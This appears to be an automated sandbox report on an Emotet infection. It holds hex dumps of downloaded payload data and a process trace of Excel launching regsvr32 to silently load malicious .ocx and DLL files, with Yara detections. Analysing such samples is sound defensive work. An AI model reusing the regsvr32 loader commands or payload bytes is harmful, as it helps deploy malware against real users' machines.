                                                                                      Data Ascii: 0uRL$0dD$03u.HtHD$ E3AEHdu3L$`D$0HXL$HXHcD$`Hu (|$`|9D$`sD$<D$<D$<D$4|$4u.HuHD$ E3A.Hu3
                                                                                      2022-05-23 06:59:57 UTC144INData Raw: 64 00 64 00 5c 00 76 00 63 00 74 00 6f 00 6f 00 6c 00 73 00 5c 00 63 00 72 00 74 00 5f 00 62 00 6c 00 64 00 5c 00 73 00 65 00 6c 00 66 00 5f 00 36 00 34 00 5f 00 61 00 6d 00 64 00 36 00 34 00 5c 00 63 00 72 00 74 00 5c 00 73 00 72 00 63 00 5c 00 77 00 69 00 6e 00 73 00 69 00 67 00 2e 00 63 00 00 00 00 00 00 00 00 00 28 00 22 00 49 00 6e 00 76 00 61 00 6c 00 69 00 64 00 20 00 73 00 69 00 67 00 6e 00 61 00 6c 00 20 00 6f 00 72 00 20 00 65 00 72 00 72 00 6f 00 72 00 22 00 2c 00 20 00 30 00 29 00 00 00 00 00 72 00 61 00 69 00 73 00 65 00 00 00 00 00 00 00 28 00 4c 00 22 00 42 00 75 00 66 00 66 00 65 00 72 00 20 00 69 00 73 00 20 00 74 00 6f 00 6f 00 20 00 73 00 6d 00 61 00 6c 00 6c 00 22 00 20 00 26 00 26 00 20 00 30 00 29 00 00 00 00 00 00 00 42 00 75 00 66
                                                                                      Data Ascii: dd\vctools\crt_bld\self_64_amd64\crt\src\winsig.c("Invalid signal or error", 0)raise(L"Buffer is too small" && 0)Buf
                                                                                      2022-05-23 06:59:57 UTC160INData Raw: 00 00 00 00 00 00 00 00 00 00 02 00 00 00 d0 95 02 00 00 00 00 00 00 00 00 00 e8 95 02 00 10 96 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 bf 02 00 01 00 00 00 00 00 00 00 ff ff ff ff 00 00 00 00 40 00 00 00 b8 95 02 00 00 00 00 00 00 00 00 00 00 00 00 00 78 bf 02 00 00 00 00 00 00 00 00 00 ff ff ff ff 00 00 00 00 40 00 00 00 38 96 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 50 96 02 00 00 00 00 00 00 00 00 00 10 96 02 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 70 c3 02 00 88 96 02 00 60 96 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 a0 96 02 00 00 00 00 00 00 00 00 00 b0 96 02 00 00 00 00 00 00 00 00 00 00 00 00 00 70 c3 02 00 00
                                                                                      Data Ascii: P@x@8Pp`p
                                                                                      2022-05-23 06:59:57 UTC176INData Raw: 58 a3 16 c1 88 69 a1 76 66 40 6c d4 25 4d 28 18 a0 1b 0e 10 00 a9 a2 3a 0e 24 ca 96 8f f9 39 e3 3a 7c 55 25 2f fb 86 43 0a e9 ed 3e d4 9c df 52 d1 64 64 23 04 34 1d bd 60 71 09 0a 56 65 00 89 75 4f 5e 9a 39 31 4d f6 32 42 70 a4 33 3a 69 10 53 fa 04 6e 4c 78 10 ef 1e 75 5c b4 32 67 05 34 81 66 58 c4 06 43 48 2a e3 04 6d bf 32 7b 55 7f 1e 66 55 20 e0 e3 a7 a9 7a 24 55 7d e0 b7 aa 8c 4e 31 6b 26 5d 89 71 4e e9 9d 25 05 af 17 7d 20 d5 00 23 22 29 a0 a3 00 69 ed 5b d4 35 86 43 35 35 e1 b7 3e 66 ba df 78 ca 63 43 23 b5 94 a0 6a 37 35 79 66 74 0d 5c ad 54 7e 6d 54 25 51 63 eb c2 4c 78 50 bb 2c 99 7d c6 71 72 2a 43 e4 12 42 aa 2a e8 63 e4 76 4c 70 62 e5 9e 71 33 f6 36 10 7d f2 86 26 11 ce aa 8f d6 86 62 43 51 f4 ff 1b 41 07 7d b7 60 9d d6 65 65 e6 3e 00 7d 46 44
                                                                                      Data Ascii: Xivf@l%M(:$9:|U%/C>Rdd#4`qVeuO^91M2Bp3:iSnLxu\2g4fXCH*m2{UfU z$U}N1k&]qN%} #")i[5C55>fxcC#j75yft\T~mT%QcLxP,}qr*CB*cvLpbq36}&bCQA}`ee>}FD
                                                                                      2022-05-23 06:59:57 UTC192INData Raw: 78 69 01 b1 22 64 64 5f 1c f9 78 97 2f 4b 67 72 60 54 a1 1e 75 54 f1 c9 cd 46 b6 2e 42 10 09 68 f4 07 ad 27 67 52 db 00 aa 65 bc 79 18 55 25 e0 a5 92 c0 3b af 97 12 a1 fa 81 03 84 f0 82 6c d7 04 18 7d f0 12 42 70 2c de 0d 4d 68 3c 33 85 2b e3 04 0e 56 d3 1d 48 05 fd 17 11 49 e1 2a 7c 05 41 b6 39 e3 73 84 26 10 46 91 a3 c6 35 fd 09 40 5b 6c ee 6d 5e 14 a2 d8 40 e1 b9 e9 4d fb aa 83 58 c1 70 69 01 f7 22 64 14 24 b2 96 a7 d1 5f 4b 1a b3 50 d1 99 d1 15 48 05 ff 07 11 41 e1 2a 7c 0d f9 63 5c 59 ab 02 eb 3d b1 1b 41 07 8d 7d 46 64 ea 2b 41 11 a5 61 78 ca ea 5f 4c 30 dd a7 40 99 d5 0c 18 7d b8 32 42 70 6c dc bd 41 9b 18 a8 83 72 e3 cc 0e ee 5a 51 6c 71 fd d7 11 f1 6a 66 58 08 f9 bf f1 2e 47 6b 26 bd 22 7b 45 df 9d 90 64 64 ac 23 41 19 a6 a4 57 39 ac 6f 4c 3c 18
                                                                                      Data Ascii: xi"dd_x/Kgr`TuTF.Bh'gReyU%;l}Bp,Mh<3+VHI*|A9s&F5@[lm^@MXpi"d$_KPHA*|c\Y=A}Fd+Aax_L0@}2BplArZQlqjfX.Gk&"{Edd#AW9oL<
                                                                                      2022-05-23 06:59:57 UTC208INData Raw: 66 4f a1 ad 78 69 58 97 6e 64 4f 40 de 2a de 93 13 7a 87 a7 26 3e f0 1f 6d 92 15 5e 66 bf 2f 6c 5f c9 f7 76 d4 28 38 c2 dd a4 8e 6d ee 30 2e fb 51 5a a3 dc 22 68 c7 0b 36 4d 5b 56 48 bd 00 36 8f 6b 8b 08 de 0c 6e d5 19 3e 1b ab 1d 4f 80 56 8d 09 ab 70 89 72 01 41 6a 0d 1d ba 3b ee 3d 95 e2 06 9d b8 d9 5f 65 f6 50 c3 75 e5 1e 98 c7 cf f7 b5 92 7c 7c c0 2b a9 4e b0 2e 7d 68 94 c3 b2 b0 03 71 2c 71 fa 79 ae 1d 43 2b 7e e8 68 c9 5f 75 81 e6 7e bc f7 36 26 7a c6 b0 d1 82 37 64 13 1e 14 43 a3 51 75 5d e4 7a 36 04 dc 88 a5 e6 10 22 ee 4f a1 f6 e0 6e 6b 89 0a 15 0b 22 d3 0d 13 05 b8 32 42 18 af 1a 72 e0 1c 74 63 e4 6c 60 c1 6e 42 1a da 29 26 ff 07 11 41 22 ed 5e 0d fb 23 5c 42 e8 06 75 70 fd 1a 9a 7b be 31 27 5a 69 67 ee 74 7d af 18 36 26 a0 21 40 c7 75 4f 4a b6
                                                                                      Data Ascii: fOxiXndO@*z&>m^f/l_v(8m0.QZ"h6M[VH6kn>OVprAj;=_ePu||+N.}hq,qyC+~h_u~6&z7dCQu]z6"Onk"2Brtcl`nB)&A"^#\Bup{1'Zigt}6&!@uOJ
                                                                                      2022-05-23 06:59:57 UTC224INData Raw: 41 e8 1d 9f 58 47 2a 68 c9 5f a9 39 61 5f 35 b1 06 d6 37 49 e5 58 c4 37 84 98 9d 9c bc e3 41 95 7a 7e b4 35 fb 20 a3 d2 b2 96 21 fb 51 92 d6 cf 5c e9 c1 2b f6 61 eb 1b 8f de 49 ce 89 e7 35 e3 ae ea a8 49 97 6e bc 79 aa 20 2a ed 17 82 9b d4 ce 66 7c e3 4e a7 b2 41 fb 32 ab eb 26 90 ae b9 76 5f e4 42 e6 c0 ab 4a e0 e6 10 f2 1d 83 72 b2 ac 6e b3 27 50 13 6b ab 33 93 39 cc 44 ad 6c 8e 5d bb b8 0c 83 53 aa 1a f1 3a 65 e7 45 9d 14 bb d9 e0 b8 35 b0 0f b1 5a c4 3f b0 0d 6f 32 45 e9 79 a1 a8 84 1c ff ed 8c 67 a1 2e ee f6 bb cd 57 b0 26 fc e9 75 99 8e 3d 4d 5f 8f 79 86 47 d0 1a 40 a5 12 b2 26 93 2a 83 ee 6f a3 d8 31 66 5a d0 19 fe 73 60 4e d9 e1 23 97 cc 36 43 20 e1 26 a0 eb 70 52 17 ee 72 fe b5 21 40 2b ec 20 f6 f3 60 71 01 e0 6e b3 89 0a 15 5b 65 e9 0d 7b 2b b8
                                                                                      Data Ascii: AXG*h_9a_57IX7Az~5 !Q\+aI5Iny *f|NA2&v_BJrn'Pk39Dl]S:eE5Z?o2Eyg.W&u=M_yG@&*o1fZs`N#6C &pRr!@+ `qn[e{+
                                                                                      2022-05-23 06:59:57 UTC240INData Raw: a0 ea f2 68 48 2a 8e 71 9b 93 ca fd 9d dc e6 60 66 58 82 f7 b7 78 6a 63 f0 24 96 76 9e c8 e7 35 3c 65 6f ea ea b5 21 7a 24 6f f3 f7 64 e9 b5 9e 31 6b 6a 25 96 a0 02 ba f3 b6 40 24 5f 38 e2 86 d9 6e 8b c3 d8 a6 d5 99 9d d4 b4 35 76 43 5b 95 1a 66 e0 7c f3 74 40 eb e6 9b 62 34 76 3c 68 c8 ca bd d0 bc 6b 67 65 fe f5 1d a7 b8 de f3 68 00 4e 67 34 30 ac 8f b9 9d 31 76 66 53 8f 04 79 e2 d5 80 2b 6f 2a 9f a9 01 ac e2 4e e9 de 27 92 dc 72 a0 a7 b1 43 fb ea a8 6a 63 43 e3 b9 a6 5f 65 37 f3 1a 40 11 e0 ea b5 21 7a 24 a2 d8 aa c1 6c b8 87 73 7d d8 d7 dd ec 4d 31 76 e7 f5 f4 5f 79 69 f7 44 74 6d ed ed a0 2a 66 5a f4 01 65 76 c8 b8 99 6a 66 58 b2 93 df 37 86 a7 0d a3 de 73 d6 f0 df 35 3c 65 e5 de 8f 65 21 7a 63 02 31 6b ec ed e0 4e 31 6b c2 d0 b9 3c c6 bc 96 66 40 24
                                                                                      Data Ascii: hH*q`fXxjc$v5<eo!z$od1kj%@$_8n5vC[f|t@b4v<hkgehNg401vfSy+o*N'rCjcC_e7@!z$ls}M1v_yiDtm*fZevjfX7s5<ee!zc1kN1k<f@$
                                                                                      2022-05-23 06:59:57 UTC256INData Raw: 3d 32 65 f4 b7 76 be 33 5b 74 c9 ab a6 98 85 fb 22 88 ad 26 5b c2 b2 73 5f e4 42 2d ac 1e b4 61 e6 20 39 1f af 55 39 ea 5e 70 9e 61 4d 6d e1 1b 50 b5 08 dd b1 23 58 f6 6e bf 69 d3 1d 33 2e a1 a8 bf cb a7 b0 57 e5 60 6e c2 78 69 c2 09 0b aa f3 22 60 33 64 bc 9d b5 03 47 3d 0a de 83 ee 21 73 ee 20 c9 bd 61 7d 20 da fe 68 c1 23 19 6e ab 3b 60 2c cc 44 5e 65 40 ac f2 be 2c 40 10 a1 0f 2a a9 2d 32 6f 31 14 74 4c ff 06 2d fa 27 7e e0 08 e3 a8 c2 9d 82 68 a8 75 fd 9f b4 de 36 f6 a4 8d 6e ee 28 39 fb 51 4d 0c 00 e6 69 c7 0b 11 8a 75 6c 48 bd 00 11 06 cf e5 41 de 3c 49 62 02 2b 6f ab 1d 68 6f bd 3e 16 ab 70 92 c9 3e 33 6a e7 15 a1 39 18 1a b5 a2 2e 86 39 f7 2a 81 3d 20 3f 65 a3 2e 87 73 11 7b 24 de 74 8b dc 89 c1 a4 37 e2 3f be c9 49 ad 58 a2 06 6d a5 2a 99 1f 01
                                                                                      Data Ascii: =2ev3[t"&[s_B-a 9U9^paMmP#Xni3.W`nxi"`3dG=!s a} h#n;`,D^e@,@*-2o1tL-'~hu6n(9QMiulHA<Ib+oho>p>3j9.9*= ?e.s{$t7?IXm*
                                                                                      2022-05-23 06:59:57 UTC272INData Raw: d5 48 fd 76 43 35 fa ee 42 b8 45 72 67 90 26 bb 43 62 7c ff 5a 84 77 34 3c 2d e7 0f 43 2d 21 32 a7 31 1d 2b 2b 5b d2 06 b8 07 4e 66 00 b5 31 15 46 22 cd 6e 5c 3d e4 1a 60 62 e4 e4 e1 3c 0e 4e 12 d8 30 11 56 bc e5 3d e7 fa 7c e5 72 67 78 23 e8 18 42 7d fd 34 55 7e be df 24 3a 34 39 a6 ed b6 e8 dc 75 4f 23 3d 53 18 66 2a 3c 16 c5 50 69 f8 3e e7 ac e4 5f 79 69 9f 15 44 9a 82 6d 48 ed 23 29 05 9f 32 76 06 06 87 22 ed 2d 2a cd 46 85 64 63 c2 9d 50 50 5e 65 38 b1 d5 65 64 6b e6 9a aa e3 25 55 36 ef 1f 6b 00 4e b0 94 da 98 4d 3c 42 b5 df 66 40 24 de 86 9e 5d 5b 2b 1b 39 e9 b7 0b 9b 54 51 63 b0 75 40 35 71 d5 d6 9e 40 72 8c b9 ad 26 34 ed d4 c3 5f 2d be 41 18 45 e5 2e 10 07 b4 85 db d4 7c 1c 7f 78 00 4e b0 1e 1d 36 b1 8e 4d f6 33 09 21 12 7f 79 02 1d 3f 77 e6 6f
                                                                                      Data Ascii: HvC5BErg&Cb|Zw4<-C-!21++[Nf1F"n\=`b<N0V=|rgx#B}4U~$:49uO#=Sf*<Pi>_yiDmH#)2v"-*FdcPP^e8edk%U6kNM<Bf@$][+9TQcu@5q@r&4_-AE.|xN6M3!y?wo
                                                                                      2022-05-23 06:59:57 UTC288INData Raw: 37 11 11 8e bf 85 4f f9 23 5c 0a 27 c8 e7 24 77 5f 65 bc b8 24 64 64 6b ee 21 05 5a cc d8 f7 6b 2b af 85 5e 30 6b 6a c1 5f 14 4d b0 fb 76 41 24 5f cd ae 27 fb 63 0c e2 24 c3 ed e7 df 41 6d 35 76 1d 42 71 6a 2e 5b b4 b3 ca 68 6b 63 43 65 b5 c3 4f 64 37 35 9f 1e 35 6a a0 e0 39 7b 24 55 75 57 e9 68 81 c3 29 6a 6a 5e 2c 72 a4 4e b7 cb 58 25 5f 79 6c d9 e5 33 6e 2a 68 35 89 99 59 da f9 2d 77 43 35 fa e7 76 59 45 72 8f a3 a8 63 43 2a bf eb 57 64 37 35 7d 4e 90 27 ee 46 a8 09 2c bc 10 66 2b 68 c7 cb 21 6a 6a 5e e2 23 6f 31 ce cd ea 8e f5 f2 e4 48 51 2b 6f dd 89 89 c0 64 d3 c4 7c 34 76 43 b6 f4 7a 67 58 45 81 0c fd 7a 62 43 62 1a ff da 75 36 35 3c e4 d1 7b 66 65 21 82 fe 50 38 2f a0 dd 10 4f 31 6b ad 1a 6c 50 df 15 00 66 c1 60 7b 15 66 70 50 2b 2e a1 a6 c9 5e 42
                                                                                      Data Ascii: 7O#\'$w_e$ddk!Zk+^0kj_MvA$_'c$Am5vBqj.[hkcCeOd755j9{$UuWh)jj^,rNX%_yl3n*h5Y-wC5vYErcC*Wd75}N'F,f+h!jj^#o1HQ+od|4vCzgXEzbCbu65<{fe!P8/O1klPf`{fpP+.^B
                                                                                      2022-05-23 06:59:57 UTC304INData Raw: ef d9 c5 73 67 78 22 ee 46 db 21 88 a0 2d be b4 74 64 64 6b 2f e8 24 1d d0 aa c6 23 a2 29 68 06 bc 6e aa 93 b7 c3 05 b8 f7 ae 41 24 5f 31 e4 5d 1a 2a 91 d5 20 c1 ab be 5a 51 6c 7d fb 46 75 f5 94 99 10 cc f3 9f 78 6a 63 0b ef 31 20 0e 9a c8 7d b5 e4 64 69 67 65 69 f7 21 29 57 6b 2b 20 89 cf 99 6a 6a 5e 00 b1 48 ff 25 66 40 6c d6 f8 29 59 50 2b 27 a7 6d 9c 11 98 a5 19 e5 74 4e 0b b8 74 eb 5e a6 ba 3a ee f9 8a 62 43 62 7c fb 5a ba 7e cb c3 2d ed ea 77 67 21 7a 6c d8 3c 46 fd 96 ff 06 b8 ea fa 5e 48 3c 05 bc 73 71 52 da a0 31 e0 d9 a8 2a 6f 2a 20 c5 2f 1b 2a 51 6c 7d ff c2 3d 73 6a 66 10 c8 77 68 b6 95 9c 0b eb b5 4e 5e 65 37 7d b1 60 55 ea 99 9a 69 f3 a5 8d 38 6b 2b 20 8d 4b fe 40 94 a1 00 b5 cc 99 76 66 40 6c d2 7c 2c 3b af d4 27 a3 e9 18 2b 66 5a 19 e1 30
                                                                                      Data Ascii: sgx"F!-tddk/$#)hnA$_1]* ZQl}Fuxjc1 }digei!)Wk+ jj^H%f@l)YP+'mtNt^:bCb|Z~-wg!zl<F^H<sqR1*o* /*Ql}=sjfwhN^e7}`Ui8k+ K@vf@l|,;'+fZ0
                                                                                      2022-05-23 06:59:57 UTC320INData Raw: 2e f1 19 cb 06 eb 67 d6 16 ec 4c ad 74 ee 8d 83 e1 c8 de 85 9e e2 df 6b e8 af 44 6a 51 2c 09 54 48 7d c6 eb b1 22 64 40 76 04 62 58 b8 9e 9b d7 97 05 a1 a9 16 da ab be a5 0b be bf 22 ef f4 61 ca 67 78 6a 2f ca d6 10 c6 5f 65 37 79 b1 39 40 1b 2e ee 7a 5a 6d de 52 43 62 e3 73 7e 78 e0 89 1f 17 7d 13 6e 3e 99 a0 e8 93 f0 3d 7c 40 a2 23 0e 60 1d 62 ed b6 19 ef d9 16 84 70 69 76 fb 59 45 b5 22 60 2e 54 63 62 bf 33 47 e8 3b 75 3f ac ed 26 7f e4 54 62 c3 70 d1 6d a0 2d 18 c7 74 87 ad 1b 50 59 44 8a 76 ed 0d 3c e7 fe 08 40 d6 dc 8e 01 a2 99 c3 65 90 90 85 33 ff 0e 2d f0 1f 7e 2e 0a 5a 5e f3 2f 7b ca 27 c4 b1 1a 7d ca 9a 8d 65 0f 2e 7f 1f a8 3f 3c d4 4c 73 ec c9 9c 1a ba 2e 72 d7 0d d4 8a 74 56 f2 cf 39 5f c1 b2 32 a0 37 ee 67 48 a1 f3 c1 ca d0 19 15 88 9c 8a e1
                                                                                      Data Ascii: .gLtkDjQ,TH}"d@vbX"agxj/_e7y9@.zZmRCbs~x}n>=|@#`bpivYE"`.Tcb3G;u?&Tbpm-tPYDv<@e3-~.Z^/{'}e.?<Ls.rtV9_27gH
                                                                                      2022-05-23 06:59:58 UTC336INData Raw: 42 62 09 66 5e 67 37 41 36 8c 6f 97 98 9a 9a 7b 24 55 39 e0 e8 20 83 8a 79 30 37 9d 84 f0 c4 7d 52 6e 15 6c d4 95 21 db bc 5b a8 6f 78 20 7e 6b 5a 96 29 25 28 0b 93 71 e1 2b 48 fd 83 97 88 9a 94 a2 a3 de 73 d6 30 27 b4 49 75 fb c0 0b 6b aa 3f 34 dc 7c 83 ec 2d 10 c7 e9 21 6a df 0d 2c d7 3b 76 66 c1 51 4f c0 93 55 70 a0 2a 3a e1 0d f2 a1 1f 41 a5 2a fb 43 be 3c 7a de 61 cb 91 5f 8f 8b b2 a9 eb 61 66 de 10 27 f6 cd 1b e0 ea 2a 75 40 90 ad 8d b8 1e 3b 43 f2 df c9 e0 2f 4e c1 79 91 f6 33 76 ec c7 a1 79 a8 3d 40 27 ee 5f 78 92 f8 22 c6 da 29 25 ff 06 d1 b6 2f 76 96 29 ab 67 f9 2f 73 1b 80 cb 89 de 20 27 2f a0 9a 9b aa 0a 75 2f fb 51 45 97 31 02 14 8b 0b 21 e2 2f be 8f 79 5d 79 89 76 40 a5 12 69 59 58 d9 3c ee 5f 78 aa cc c6 3f da 29 25 ff 06 d9 b6 2f 76 f6 8d
                                                                                      Data Ascii: Bbf^g7A6o{$U9 y07}Rnl![ox ~kZ)%(q+Hs0'Iuk?4|-!j,;vfQOUp*:A*C<za_af'*u@;C/Ny3vy=@'_x")%/v)g/s '/u/QE1!/y]yv@iYX<_x?)%/v
                                                                                      2022-05-23 06:59:58 UTC352INData Raw: 5f 65 8f f6 3e 65 cc b2 67 65 a6 a0 24 55 e9 a8 29 68 88 94 31 6b 23 85 48 3c 7d f2 74 66 0c ff 5f 79 98 86 50 2b 8b e9 6a 48 de b8 5a 51 43 d4 76 43 75 b2 68 66 68 a4 72 67 a9 8f 63 43 92 f7 74 5f b1 d2 35 3c 5a 83 6b 67 11 e0 78 24 15 de 6b 2b 89 e7 4e 31 63 ae 5c 48 d8 aa 31 76 83 a8 24 5f 5d a9 5a 50 c3 87 2a 68 d2 c3 66 5a 69 ae 37 76 df dc 71 6a 41 aa 45 72 73 bc 68 63 6b 90 34 76 77 96 37 35 20 a7 66 6b 4f 96 21 7a 11 a0 39 6b 0f ac 02 4e 65 9e 6a 5e ad c2 4d 31 36 a2 42 24 b7 87 69 58 ed d4 6f 2a 3c 8c 28 66 9a ae 6c 35 5d 5e 34 71 0a a2 5a 45 5e 7a 79 6a 91 5e 63 34 02 9b 67 37 c1 21 64 64 9e 79 64 21 fa e0 57 39 93 35 69 00 0a 11 6a 6a ce 8c 3e 4d 75 56 67 40 4c 7e 78 69 f8 90 29 6f 42 49 49 2a 11 79 50 6c 91 b2 41 35 09 49 67 58 b1 56 66 78 d2
                                                                                      Data Ascii: _e>ege$U)h1k#H<}tf_yP+jHZQCvCuhfhrgcCt_5<Zkgx$k+N1c\H1v$_]ZP*hfZi7vqjAErshck4vw75 fkO!z9kNej^M16B$iXo*<(fl5]^4qZE^zyj^c4g7!ddyd!W95ijj>MuVg@L~xi)oBII*yPlA5IgXVfx


                                                                                      Click to jump to process

                                                                                      Click to jump to process

                                                                                      Click to dive into process behavior distribution

                                                                                      Click to jump to process

                                                                                      Target ID:0
                                                                                      Start time:08:59:16
                                                                                      Start date:23/05/2022
                                                                                      Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
                                                                                      Imagebase:0x13f8b0000
                                                                                      File size:28253536 bytes
                                                                                      MD5 hash:D53B85E21886D2AF9815C377537BCAC3
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:high

                                                                                      Target ID:3
                                                                                      Start time:08:59:26
                                                                                      Start date:23/05/2022
                                                                                      Path:C:\Windows\System32\regsvr32.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:C:\Windows\System32\regsvr32.exe /S ..\uxevr1.ocx
                                                                                      Imagebase:0xff260000
                                                                                      File size:19456 bytes
                                                                                      MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Yara matches:
                                                                                      • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000003.00000002.926879685.00000000002C0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000003.00000002.927251205.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                      Reputation:high

                                                                                      Target ID:4
                                                                                      Start time:08:59:28
                                                                                      Start date:23/05/2022
                                                                                      Path:C:\Windows\System32\regsvr32.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:C:\Windows\system32\regsvr32.exe "C:\Windows\system32\FIdWcB\GulPp.dll"
                                                                                      Imagebase:0xff260000
                                                                                      File size:19456 bytes
                                                                                      MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Yara matches:
                                                                                      • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000004.00000002.1347157002.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000004.00000002.1346169156.0000000000140000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                      Reputation:high

                                                                                      Target ID:5
                                                                                      Start time:08:59:30
                                                                                      Start date:23/05/2022
                                                                                      Path:C:\Windows\System32\regsvr32.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:C:\Windows\System32\regsvr32.exe /S ..\uxevr2.ocx
                                                                                      Imagebase:0xff260000
                                                                                      File size:19456 bytes
                                                                                      MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Yara matches:
                                                                                      • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000005.00000002.1264915905.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000005.00000002.1264216924.00000000003F0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                      Reputation:high

                                                                                      Target ID:7
                                                                                      Start time:09:00:01
                                                                                      Start date:23/05/2022
                                                                                      Path:C:\Windows\System32\svchost.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:C:\Windows\System32\svchost.exe -k WerSvcGroup
                                                                                      Imagebase:0xff7d0000
                                                                                      File size:27136 bytes
                                                                                      MD5 hash:C78655BC80301D76ED4FEF1C1EA40A7D
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:moderate

                                                                                      Target ID:8
                                                                                      Start time:09:00:22
                                                                                      Start date:23/05/2022
                                                                                      Path:C:\Windows\System32\regsvr32.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:C:\Windows\System32\regsvr32.exe /S ..\uxevr3.ocx
                                                                                      Imagebase:0xff260000
                                                                                      File size:19456 bytes
                                                                                      MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:high

                                                                                      Target ID:9
                                                                                      Start time:09:00:25
                                                                                      Start date:23/05/2022
                                                                                      Path:C:\Windows\System32\regsvr32.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:C:\Windows\System32\regsvr32.exe /S ..\uxevr4.ocx
                                                                                      Imagebase:0xff260000
                                                                                      File size:19456 bytes
                                                                                      MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Yara matches:
                                                                                      • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000009.00000002.1056224873.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000009.00000002.1055136020.0000000000140000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                      Reputation:high

                                                                                      Target ID:10
                                                                                      Start time:09:00:28
                                                                                      Start date:23/05/2022
                                                                                      Path:C:\Windows\System32\regsvr32.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:C:\Windows\system32\regsvr32.exe "C:\Windows\system32\AQbqR\xhDhNsFFy.dll"
                                                                                      Imagebase:0xff260000
                                                                                      File size:19456 bytes
                                                                                      MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Yara matches:
                                                                                      • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.1346182348.0000000000160000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000A.00000002.1347032948.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                      Reputation:high

                                                                                      Target ID:13
                                                                                      Start time:09:02:05
                                                                                      Start date:23/05/2022
                                                                                      Path:C:\Windows\System32\regsvr32.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:C:\Windows\system32\regsvr32.exe "C:\Windows\system32\IWNForDwCavadlTU\oACuhBcYqGjSrI.dll"
                                                                                      Imagebase:0xff260000
                                                                                      File size:19456 bytes
                                                                                      MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:high

                                                                                      Reset < >

                                                                                        Execution Graph

                                                                                        Execution Coverage:6.7%
                                                                                        Dynamic/Decrypted Code Coverage:2.5%
                                                                                        Signature Coverage:10%
                                                                                        Total number of Nodes:1905
                                                                                        Total number of Limit Nodes:30
